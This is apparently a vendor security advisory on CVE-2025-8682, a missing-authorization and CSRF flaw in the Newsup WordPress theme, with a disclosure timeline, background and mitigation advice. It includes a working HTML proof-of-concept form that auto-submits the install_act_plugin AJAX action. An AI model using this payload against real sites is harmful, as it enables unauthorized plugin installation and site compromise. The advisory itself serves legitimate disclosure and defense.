Newsup is a magazine-style WordPress theme with more than 30,000 active installations, prized for its demo importer and “one-click extras” that streamline editorial site setup. During security testing we identified CVE-2025-8682, a high-impact Missing Authorization flaw: the theme exposes an AJAX action named install_act_plugin that can be invoked by low-privileged users (Subscriber+) and, in some deployments, even unauthenticated visitors. Because the handler does not enforce a capability check (e.g., install_plugins / manage_options) and is callable without a CSRF nonce, attackers can silently initiate plugin installation/activation flows, introducing untrusted code into the site.
| CVE | CVE-2025-8682 |
| Plugin Version | Newsup <= 5.0.10 |
| Critical | High |
| All Time | N/A |
| Active installations | 30 000+ |
| Publicly Published | October 9, 2025 |
| Last Updated | October 9, 2025 |
| Researcher | Dmitrii Ignatyev |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8682 https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/newsup/newsup-5010-missing-authorization-to-authenticated-subscriber-plugin-installation |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
PSC by CleantalkJoin the community of developers who prioritize security. Highlight your plugin in the WordPress catalog.
Timeline
| July 29, 2025 | Plugin testing and vulnerability detection in the Newsup have been completed |
| July 29, 2025 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| October 9, 2025 | Registered CVE-2025-8682 |
Discovery of the Vulnerability
A review of the Newsup admin integration revealed a convenience endpoint wired to admin-ajax.php?action=install_act_plugin. Unlike secure implementations that guard such actions behind both a nonce (to prevent CSRF) and a capability check (to restrict access to Administrators), the Newsup code path accepts the request and proceeds with installation logic based solely on the presence of the action parameter. As a result, a Subscriber—or any user with a valid session—and in some configurations even a non-logged visitor, can execute the action by submitting a trivial POST. In the wild, this is particularly risky because many hosting stacks do not block unauthenticated admin-ajax.php access.
Understanding of CSRF attack’s
WordPress hardens privileged actions through two independent gates: (1) capabilities checked via current_user_can()to ensure the caller is an Administrator (or another appropriate role); and (2) nonces validated with check_ajax_referer() to defeat cross-site request forgery. Numerous historical CVEs arise when developers add only one control or skip both. Themes that expose “install/activate recommended plugin” buttons through AJAX without those checks allow low-privileged users (or unauthenticated browsers through CSRF) to install arbitrary packages. CVE-2025-8682 fits this pattern exactly: a state-changing AJAX bridge that trusts the request and browser context and never verifies that the caller is allowed to install plugins.
Exploiting the CSRF Vulnerability
To exploit CVE-2025-8682, an attacker with no cookies:
POC:
<html> <body> <form action="http://127.0.0.1/wordpress/wp-admin/admin-ajax.php" method="POST"> <input type="hidden" name="action" value="install_act_plugin" /> <input type="submit" value="Submit request" /> </form> <script> history.pushState('', '', '/'); document.forms[0].submit(); </script> </body> </html>____
The ability to install or activate plugins without administrative approval is tantamount to remote code execution by proxy. An attacker could deploy a backdoored plugin to establish persistence, create new admin users, siphon data, inject SEO spam, or add web shells. On news portals and high-traffic magazines, silent installation of malicious extensions can lead to widespread phishing (malicious widgets/links), ad fraud, unauthorized redirects, or full site defacement. Because the action is easy to repeat, a single campaign can re-install the payload after cleanup, causing recurring incidents and damaging brand trust and ad partnerships.
Recommendations for Improved Security
Update Newsup to the patched release as soon as it’s available.
Harden: deploy a WAF rule to block action=install_act_plugin from untrusted origins; consider SameSite=Lax/Strict for auth cookies to reduce CSRF surface.
Minimize admins and remove stale accounts; require MFA.
Monitor plugin changes using file integrity and plugin-install hooks, and configure alerts for unexpected install/activate events.
By taking proactive measures to address CSRF vulnerabilities like CVE-2025-8682 WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #CSRF #WebsiteSafety #StayProtected #HighVulnerability
Use CleanTalk solutions to improve the security of your website
Dmitrii I.